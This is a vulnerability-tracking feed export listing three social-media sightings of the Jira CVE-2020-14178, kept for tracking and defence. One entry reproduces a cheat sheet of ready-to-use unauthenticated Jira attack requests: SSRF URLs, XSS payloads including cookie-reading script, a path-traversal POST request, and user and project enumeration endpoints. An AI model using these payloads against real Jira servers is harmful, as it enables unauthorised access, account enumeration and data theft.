https://vulnerability.circl.lu/sightings/feed 2026-05-05T14:24:50.527724+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent sightings. https://vulnerability.circl.lu/sighting/901d47aa-a8c5-4d86-b85b-ed49f7061c4e/export 2026-05-05T14:24:50.911417+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "901d47aa-a8c5-4d86-b85b-ed49f7061c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-14178", "type": "seen", "source": "https://t.me/cibsecurity/14399", "content": "ATENTION\u203c New - CVE-2020-14178\n\nAffected versions of Atlassian Jira Server and Data Center allow remote attackers to enumerate project keys via an Information Disclosure vulnerability in the /browse.PROJECTKEY endpoint. The affected versions are before version 7.13.7, from version 8.0.0 before 8.5.8, and from version 8.6.0 before 8.12.0.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-09-01T12:55:33.000000Z"} 2020-09-01T12:55:33+00:00 https://vulnerability.circl.lu/sighting/e1346311-8897-4767-8e25-e99d35aba9b4/export 2026-05-05T14:24:50.911275+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "e1346311-8897-4767-8e25-e99d35aba9b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-14178", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try the SSTI Payloads\n11. CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12. CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"} 2024-03-18T07:23:33+00:00 https://vulnerability.circl.lu/sighting/8439d859-f098-4b81-ab4f-87675134d4e1/export 2026-05-05T14:24:50.908951+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "8439d859-f098-4b81-ab4f-87675134d4e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-14178", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2581", "content": "#exploit\n#Infographics\nUnauthenticated JIRA CVEs to Exploit:\nCVE-2020-14179 - Information Disclosure\nhttps://github.com/c0brabaghdad1/CVE-2020-14179\nCVE-2020-14181 - User Enumeration\nhttps://github.com/Rival420/CVE-2020-14181\nCVE-2020-14178 - Project Key Enumeration\nCVE-2019-3402 - XSS \nCVE-2019-11581 - SSTI\nCVE-2019-8451 - SSRF\nCVE-2019-8449 - User Information Disclosure\nCVE-2019-3403 - User Enumeration\nCVE-2019-8442 - Sensitive Info Disclosure\nhttps://mobile.twitter.com/harshbothra_/status/1346109605756116995", "creation_timestamp": "2024-10-09T19:49:41.000000Z"} 2024-10-09T19:49:41+00:00